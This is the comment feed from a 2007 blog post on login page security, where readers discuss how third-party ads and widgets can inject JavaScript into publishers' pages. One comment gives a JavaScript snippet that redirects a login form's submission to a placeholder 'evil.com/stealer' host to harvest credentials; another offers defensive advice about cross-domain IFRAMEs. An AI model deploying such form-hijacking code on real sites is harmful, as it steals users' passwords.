Comments on: Login page security issues http://www.mikeonads.com/2007/05/31/login-page-security-issues/ Ramblings about online advertising, ad networks & other techie randomness Wed, 28 May 2014 09:36:00 +0000 hourly 1 http://wordpress.org/?v=3.2.1 By: data recovery http://www.mikeonads.com/2007/05/31/login-page-security-issues/comment-page-1/#comment-147341 data recovery Wed, 07 Mar 2012 07:04:00 +0000 http://www.mikeonads.com/2007/05/31/login-page-security-issues/#comment-147341 Great post, thank you Great post, thank you

]]> By: whooknew http://www.mikeonads.com/2007/05/31/login-page-security-issues/comment-page-1/#comment-1014 whooknew Mon, 04 Jun 2007 05:12:56 +0000 http://www.mikeonads.com/2007/05/31/login-page-security-issues/#comment-1014 Just 10 minutes ago I was asking a friend about the security ramifications of widgets. He pointed me to your blog immediately. I'm not a programmer but I do know there are more people who use javascript/widgets that don't understand code than those that do. As most of us (non-programmers) just copy code and stick it into templates, I can foresee a very ugly phenomenon. Imagine an army of nasty widgets that collect different pieces of random information and another brain program that puts the info back together. I don't what could happen, but I'm sure it is not a good thing. This could lead to very damaging software as the exponential viral effects are tremendous. I would assume that in the future widgets will be able to play with other widgets and thus several independent programs may run on the browser simultaneously. Maybe I don't know what I'm talking about, but it seems possible. Thoughts? Just 10 minutes ago I was asking a friend about the security ramifications of widgets. He pointed me to your blog immediately. I’m not a programmer but I do know there are more people who use javascript/widgets that don’t understand code than those that do.

As most of us (non-programmers) just copy code and stick it into templates, I can foresee a very ugly phenomenon. Imagine an army of nasty widgets that collect different pieces of random information and another brain program that puts the info back together. I don’t what could happen, but I’m sure it is not a good thing.

This could lead to very damaging software as the exponential viral effects are tremendous. I would assume that in the future widgets will be able to play with other widgets and thus several independent programs may run on the browser simultaneously. Maybe I don’t know what I’m talking about, but it seems possible.

Thoughts?

]]> By: 3543244 http://www.mikeonads.com/2007/05/31/login-page-security-issues/comment-page-1/#comment-984 3543244 Fri, 01 Jun 2007 17:06:44 +0000 http://www.mikeonads.com/2007/05/31/login-page-security-issues/#comment-984 As far as the other ways "the smarter guys out there" could do it, my JS would be more like: document.getElementById('passform').action= 'http://www.evil.com/stealer?goto='+ escape(document.getElementById('passform').action); Where that "stealer" would record the submitted information and either invisibly redirect (for a GET form), or write out an invisible document with some javascript to submit it to the original location. Only the closest observation would catch it. Especially if the name is more innocuous than "evil.com/stealer". As far as the other ways “the smarter guys out there” could do it, my JS would be more like:

document.getElementById(‘passform’).action=
http://www.evil.com/stealer?goto='+
escape(document.getElementById(‘passform’).action);

Where that “stealer” would record the submitted information and either invisibly redirect (for a GET form), or write out an invisible document with some javascript to submit it to the original location.

Only the closest observation would catch it. Especially if the name is more innocuous than “evil.com/stealer”.

]]> By: David Weinstein http://www.mikeonads.com/2007/05/31/login-page-security-issues/comment-page-1/#comment-982 David Weinstein Fri, 01 Jun 2007 15:48:14 +0000 http://www.mikeonads.com/2007/05/31/login-page-security-issues/#comment-982 Another way to protect yourself from this sort of attack as a publisher is to only serve IFRAME ads (never javascript) and ensure that the domain serving the IFRAME content is different that the domain of the site where the ad is appearing. If you do this, you'll always be safe from XSS attacks served via ads, since the browser's security model will not let javascript in the child IFRAME from reading anything in the DOM on the parent when the domains don't match. As a sidenote: the insidious thing about XSS attacks served anonymously via an adserver is that there's almost no way for the victim publisher to know that something like this is taking place. It's a silent but deadly attack and it's therefore very hard to get a handle on the scope of the problem. Another way to protect yourself from this sort of attack as a publisher is to only serve IFRAME ads (never javascript) and ensure that the domain serving the IFRAME content is different that the domain of the site where the ad is appearing. If you do this, you’ll always be safe from XSS attacks served via ads, since the browser’s security model will not let javascript in the child IFRAME from reading anything in the DOM on the parent when the domains don’t match.

As a sidenote: the insidious thing about XSS attacks served anonymously via an adserver is that there’s almost no way for the victim publisher to know that something like this is taking place. It’s a silent but deadly attack and it’s therefore very hard to get a handle on the scope of the problem.

]]> By: yardley.ca / dash » Trust http://www.mikeonads.com/2007/05/31/login-page-security-issues/comment-page-1/#comment-976 yardley.ca / dash » Trust Fri, 01 Jun 2007 13:04:59 +0000 http://www.mikeonads.com/2007/05/31/login-page-security-issues/#comment-976 [...] released a little demo that illustrates how an advertisement (or a widget, for that matter) provided by a third-party [...] [...] released a little demo that illustrates how an advertisement (or a widget, for that matter) provided by a third-party [...]

]]> By: Mike http://www.mikeonads.com/2007/05/31/login-page-security-issues/comment-page-1/#comment-973 Mike Fri, 01 Jun 2007 12:18:20 +0000 http://www.mikeonads.com/2007/05/31/login-page-security-issues/#comment-973 Seems I should do some cross-browser testing :). Works in Firefox right now, and I'm sure I can get it to work in IE as well, might just need to do a bit of tweaking. Seems I should do some cross-browser testing :) .

Works in Firefox right now, and I’m sure I can get it to work in IE as well, might just need to do a bit of tweaking.

]]> By: Sandi Hardmeier http://www.mikeonads.com/2007/05/31/login-page-security-issues/comment-page-1/#comment-972 Sandi Hardmeier Fri, 01 Jun 2007 10:50:20 +0000 http://www.mikeonads.com/2007/05/31/login-page-security-issues/#comment-972 It didn't work for me - the results in the popup were: "I just stole your info, your username = undefined and your pass is Submit password" It didn’t work for me – the results in the popup were:

“I just stole your info, your username = undefined and your pass is Submit password”

]]>